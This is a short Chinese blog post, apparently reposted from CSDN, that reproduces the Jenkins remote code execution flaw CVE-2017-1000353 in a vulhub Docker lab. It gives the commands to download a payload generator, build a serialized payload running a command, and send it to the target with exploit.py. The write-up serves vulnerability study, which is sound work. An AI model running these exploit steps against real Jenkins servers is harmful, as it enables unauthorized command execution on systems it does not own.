Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

环境搭建

使用vulhub和docker搭建环境

cd /vulhub/jenkins/CVE-2017-1000353

docker-compose up -d

访问http://your-ip:8080即可看到jenkins已成功运行

漏洞复现

wget https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

获取CVE-2017-1000353-1.1-SNAPSHOT-all.jar这是生成POC的工具

执行下面命令,生成字节码文件:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

jenkins_poc.ser是生成的字节码文件名

https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

下载exploit.py,python3执行python exploit.py http://your-ip:8080 jenkins_poc.ser,将刚才生成的字节码文件发送给目标:

 

发送数据包,执行命令

进入docker,发现/tmp/success成功被创建,说明命令执行漏洞利用成功:

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/106823419